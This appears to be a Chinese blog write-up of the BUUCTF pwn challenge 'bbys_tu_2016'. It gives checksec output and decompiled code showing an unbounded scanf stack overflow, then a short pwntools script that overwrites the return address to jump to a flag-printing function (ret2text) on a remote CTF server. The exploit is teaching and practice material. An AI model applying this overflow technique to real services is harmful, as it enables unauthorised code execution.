加载头像

bbys_tu_2016

Ubuntu 16


0x01


checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/bbys_tu_2016/bbys_tu_2016'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //
PIE: No PIE (0x8048000)

IDA

main()

1
2
3
4
5
6
7
8
9
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [esp+14h] [ebp-Ch] BYREF

puts("This program is hungry. You should feed it.");
__isoc99_scanf("%s", &v4);
puts("Do you feel the flow?");
return 0;
}

可疑函数printFlag()

1
2
3
4
5
6
7
8
9
10
11
int printFlag()
{
char s[50]; // [esp+1Ah] [ebp-3Eh] BYREF
FILE *stream; // [esp+4Ch] [ebp-Ch]

stream = fopen("flag.txt", "r");
fgets(s, 50, stream);
puts(s);
fflush(stdout);
return fclose(stream);
}

0x02


思路 retext

0x03


exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *

context(os='linux', arch='i386', log_level='debug')
io = remote('node4.buuoj.cn', 29910)
path = './bbys_tu_2016'
# io = process([path])
# elf = ELF(path)
# libc = ELF('./libc-2.23.so')

get_flag = 0x804856D
padding = 0x14 + 0x4
payload = flat(b'a'*padding, get_flag)
io.sendline(payload)

io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體